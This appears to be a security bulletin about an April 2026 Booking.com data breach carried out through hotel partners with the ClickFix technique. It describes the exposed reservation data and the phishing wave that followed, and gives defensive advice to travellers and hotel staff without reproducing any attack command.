AgenceEvana
Back to bulletins
High2026-04-14CVSS N/Abreachphishingpersonal-datasupply-chainbookingstorm-1865clickfix

Booking.com Data Breach: Reservation Data Exposed, Targeted Phishing Wave Underway

Booking.com notified customers on April 13, 2026 that unauthorised access exposed reservation data including names, emails, phone numbers, addresses, and booking details. The attack went through hotel partners using the ClickFix technique.

Context

On April 13, 2026, Booking.com began notifying customers of a data breach that allowed unauthorised third parties to access reservation data. The platform has over 100 million active users and 500 million monthly visits. The exact scope of the incident has not been disclosed.

Attack Mechanism

The attack did not target Booking.com's systems directly, but its hotel partners. The criminal group Storm-1865, identified by Microsoft, used the ClickFix technique: hotel employees were tricked by malicious web pages asking them to run a PowerShell command presented as a "technical fix". This malware then compromised the partner accounts connected to the platform.

This attack vector — targeting a supplier to reach its customers — is a supply chain attack, an increasingly common method.

Exposed Data

  • Full names
  • Email addresses
  • Phone numbers
  • Postal addresses
  • Booking dates and details
  • Messages exchanged with hotels through the platform

Banking and financial information was not affected.

Post-Breach Risks

The stolen data enables highly convincing phishing attacks. Reports indicate travellers received WhatsApp messages before Booking.com's official notification, containing accurate booking details to appear legitimate, requesting "payment changes" or "urgent confirmation".

An Australian traveller lost $100 to a scammer posing as Booking.com support a few days before departing for Bali.

What to Do if You Received a Notification

  1. Ignore any unsolicited messages about your reservation — including WhatsApp, SMS, and email
  2. Log in directly on the official Booking.com website or app to check your booking
  3. Do not click any links received in messages about your stay
  4. Your reservation PIN has been reset by Booking.com — only update it through the official app
  5. Report any suspicious contact using the official Booking.com form

General Recommendations

  • Be wary of last-minute payment requests tied to an existing reservation — no legitimate platform will ask you to pay via WhatsApp
  • Use a dedicated email address for travel to limit the impact of any future breach
  • Enable two-factor authentication on your Booking.com account
  • For hospitality professionals: train your teams to recognise ClickFix techniques — be suspicious of any web page asking you to paste and run a command in the terminal or PowerShell